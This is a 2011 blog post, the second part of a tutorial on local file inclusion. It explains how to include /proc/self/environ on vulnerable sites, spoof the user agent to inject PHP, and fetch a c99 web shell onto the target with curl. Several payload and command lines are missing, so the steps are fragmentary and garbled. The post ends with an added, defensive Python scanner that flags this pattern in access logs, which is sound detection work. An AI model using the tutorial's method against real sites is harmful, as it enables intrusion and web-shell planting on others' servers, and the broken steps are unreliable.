Thursday, September 8, 2011

Local File Inclusion Tutorial Part 2 of 4

1. A site vulnerable to LFI
2. PHP knowledge
3. Browser: Mozilla Firefox...

So... first you find some site vulnerable to LFI... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D

Now, on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our user agent (Mozilla, Netscape, etc.) and now we must spoof it... but how?

Open a new tab in Mozilla, and type "about:config" (without quotes)...

Now, in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Preference name                    Status     Type      Value
general.useragent.extra.firefox    default    string    Firefox/3.0.7

Now, double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"

If everything is good you will get shell included... Otherwise, you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using PHP I found another way...

Instead of typing
as user agent, type this:
Then load your vulnerable page like this:
Code: -o c99.php
So, let's review... basically, you are just adding the &cmd= thing at the end of the URL...

Now, using the "curl" command you will get the content of the shell in txt format, and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:
And that's all for now...cheers!
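
For defenders, the pattern described above (a file parameter that resolves to /proc/self/environ, combined with a request header carrying PHP tags) shows up in web access logs. The following is an added example, not part of the original post: a Python check over combined-format access log lines. The function names, finding labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LINE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3} \S+ "([^"]*)" "([^"]*)"')

def normalize(target):
    """Decode and canonicalize a request target before matching on it."""
    for _ in range(3):                        # percent-encoding may be applied more than once
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    target = re.sub(r"/(\./)+", "/", target.replace("\\", "/"))  # drop "/./" segments
    return re.sub(r"/{2,}", "/", target).lower()                 # collapse "//"

def findings(line):
    """Return the list of finding labels for one log line."""
    m = LINE.match(line)
    if not m:
        return ["unparsed"]
    target, referer, agent = m.groups()
    hits = []
    if "/proc/self/environ" in normalize(target):
        hits.append("environ-include")
    # Request headers are copied into the CGI environment, so PHP tags there matter.
    if any("<?" in unquote(h) for h in (referer, agent)):
        hits.append("php-tag-in-header")
    return hits

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := findings(line))}

# Constructed sample lines (documentation IP ranges, not from a real server).
SAMPLE = [
    '203.0.113.5 - - [08/Sep/2011:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0 Firefox/3.0.7"',
    '203.0.113.9 - - [08/Sep/2011:10:01:00 +0000] "GET /index.php?page=../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?php /* constructed marker */ ?>"',
    '203.0.113.9 - - [08/Sep/2011:10:02:00 +0000] "GET /index.php?page=%2e%2e%2fproc%2f.%2fself%2f%2fenviron HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Sep/2011:10:03:00 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "ExampleBot/1.0 <?php /* constructed */ ?>"',
]

if __name__ == "__main__":
    for number, labels in scan(SAMPLE).items():
        print(number, labels)
```

A line that raises both findings from the same client, answered with status 200, is the combination worth escalating first.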
